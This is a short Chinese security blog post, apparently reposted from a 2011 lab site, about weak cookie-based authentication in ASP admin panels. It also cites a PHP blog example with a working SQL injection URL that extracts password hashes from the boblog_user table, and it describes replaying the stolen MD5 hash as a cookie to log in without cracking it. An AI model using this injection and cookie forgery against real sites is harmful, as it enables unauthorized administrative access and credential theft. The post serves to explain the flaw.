转载自:http://hi.baidu.com/micropoor
<%
if Request.Cookies("xxx")("user")="" or Request.Cookies("xxx")("admin_pass")="" or Request.Cookies("xxx")("admin_class")="" then
Response.Cookies("xxx")("user")=""
Response.Cookies("xxx")("pass")=""
Response.Cookies("xxx")("admin_class")=""
response.redirect "ad_login.asp"
response.end
end if
%>
'//代码片段--判断身份
<%if rs("admin_class")=0 then response.write" selected"%>>admin
<%if rs("admin_class")=1 then response.write"selected"%>>user
<%if rs("admin_class")=2 then response.write"selected"%>>guest |
结论:往往快捷方便,注定踏上了死亡路。
//php实例拓展:这里我引用下 心灵牛的一个例子:
//代码片段
if ($go) @list($job, $itemid)=@explode('_', basename($go));
//略
原本注入语句为
index.php?go=category_0) union select 1,concat(userpsw) from boblog_user%23
//略
假如某牛真的注入成功得到MD5密码不用去跑MD5了
直接
setcookie ('userid', '1',);
setcookie ('userpsw', 'md5密文', ); |
文章作者
Nuclear'Atk
上次更新
2011-11-11
许可协议
Nuclear'Atk(核攻击)网络安全实验室版权所有,转载请注明出处。